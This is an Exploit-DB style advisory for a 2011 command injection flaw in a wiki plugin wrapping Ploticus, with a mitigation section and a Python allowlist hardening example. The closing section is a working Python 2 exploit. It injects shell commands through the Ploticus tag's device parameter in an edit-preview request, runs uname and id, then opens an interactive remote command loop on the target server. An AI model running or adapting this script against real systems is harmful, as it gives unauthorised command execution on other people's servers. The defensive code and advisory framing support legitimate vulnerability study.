Vendor: Ploticus
By: Diskovered
CVSS: 8.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: Ploticus
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

Command Execution Vulnerability in Ploticus

Ploticus is a software package for generating graphs and plots. The vulnerability is command injection caused by improper sanitization of user input: the value of the 'device' parameter of the Ploticus tag is passed to the shell unescaped, so an attacker can inject arbitrary commands through it and they are executed on the server. The exploit below reaches the parameter through a wiki plugin that wraps Ploticus, submitting a page-edit preview whose content contains a `<<Ploticus device=... >>` tag.

Mitigation:

Prevent command injection with input validation: sanitize user input and check it against a whitelist of acceptable values, rejecting anything that does not match.
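The mitigation above, as an added Python example that is not code from this page or from the affected plugin: it parses a `<<Ploticus ... >>` tag out of submitted wiki content (the tag syntax is taken from the exploit below), checks the `device` value against an allowlist, and builds an argument vector for the ploticus binary so that no shell ever re-parses user text. The allowlist contents, the `-<device>` flag form of the ploticus command line and the attribute names other than `device` are assumptions; the sample tags are constructed. The unsafe builder is kept only as a string for contrast and is never executed.

```python
import re
import subprocess

# Assumed allowlist of ploticus output device names; the real plugin's accepted
# values are not given on the page, so treat this set as a constructed example.
ALLOWED_DEVICES = frozenset({"png", "gif", "jpeg", "svg", "eps"})

# One tag: <<Ploticus key=value key="quoted value" ... >>
TAG_RE = re.compile(r"<<\s*Ploticus\b(?P<attrs>.*?)>>", re.DOTALL)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S*))')


def parse_ploticus_tag(content):
    """Return the attribute dict of the first Ploticus tag in the submitted
    page content, or None if there is no tag. Quoted and bare values are
    accepted; the value is returned verbatim (no validation happens here)."""
    m = TAG_RE.search(content)
    if m is None:
        return None
    attrs = {}
    for key, dq, sq, bare in ATTR_RE.findall(m.group("attrs")):
        attrs[key] = dq if dq else (sq if sq else bare)
    return attrs


def build_command_unsafe(attrs, script_path):
    """The vulnerable pattern: the user-controlled device value is spliced
    into a single shell string, so a ';' inside it becomes a second command.
    Kept as a string builder only, to contrast with build_command_safe."""
    return 'ploticus -%s "%s"' % (attrs.get("device", "png"), script_path)


def validate_device(value):
    """Allowlist check: the device must be exactly one of the known names.
    Anything else, shell metacharacters included, is rejected rather than
    escaped, which is the mitigation the advisory recommends."""
    if not isinstance(value, str) or value.lower() not in ALLOWED_DEVICES:
        raise ValueError("unsupported Ploticus device: %r" % (value,))
    return value.lower()


def build_command_safe(attrs, script_path):
    """Hardened form: validated device plus an argv list. The '-<device>'
    flag form is an assumption about ploticus's command line."""
    device = validate_device(attrs.get("device", "png"))
    return ["ploticus", "-" + device, script_path]


def run_ploticus(content, script_path, runner=subprocess.run):
    """Render the first Ploticus tag found in `content`. `runner` is injectable
    so the argv construction can be exercised without ploticus installed."""
    attrs = parse_ploticus_tag(content)
    if attrs is None:
        raise ValueError("no Ploticus tag in content")
    argv = build_command_safe(attrs, script_path)
    # shell=False is the property that matters: each argv element reaches
    # execve as-is and is never tokenized by /bin/sh.
    return runner(argv, shell=False, capture_output=True, check=True)


# Constructed sample inputs: a legitimate tag and one shaped like the page's
# payload, with a shell metacharacter inside the device value.
GOOD_CONTENT = '<<Ploticus device="png" data="sales.txt" >>'
BAD_CONTENT = '<<Ploticus device="png; id" data="sales.txt" >>'


def demo():
    """Return (argv built for the good tag, rejection message for the bad tag)."""
    recorded = {}

    def fake_runner(argv, **kwargs):
        recorded["argv"] = argv  # record instead of executing
        return None

    run_ploticus(GOOD_CONTENT, "chart.pl", runner=fake_runner)
    try:
        run_ploticus(BAD_CONTENT, "chart.pl", runner=fake_runner)
        rejected = None
    except ValueError as exc:
        rejected = str(exc)
    return recorded["argv"], rejected


if __name__ == "__main__":
    print(build_command_unsafe(parse_ploticus_tag(BAD_CONTENT), "chart.pl"))
    print(demo())
```

The allowlist does the work here: because only known device names are accepted, there is nothing to escape, and building an argv list instead of a shell string removes the second precondition the exploit relies on, a shell parsing the tag value.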
Source (Exploit-DB raw data):

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################

import urllib
import urllib2
import sys
def banner():
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"


def usage():
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"

if len(sys.argv)< 2:
	usage()
	quit()

domain = sys.argv[1]
def commandexec(cmd):
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]


banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)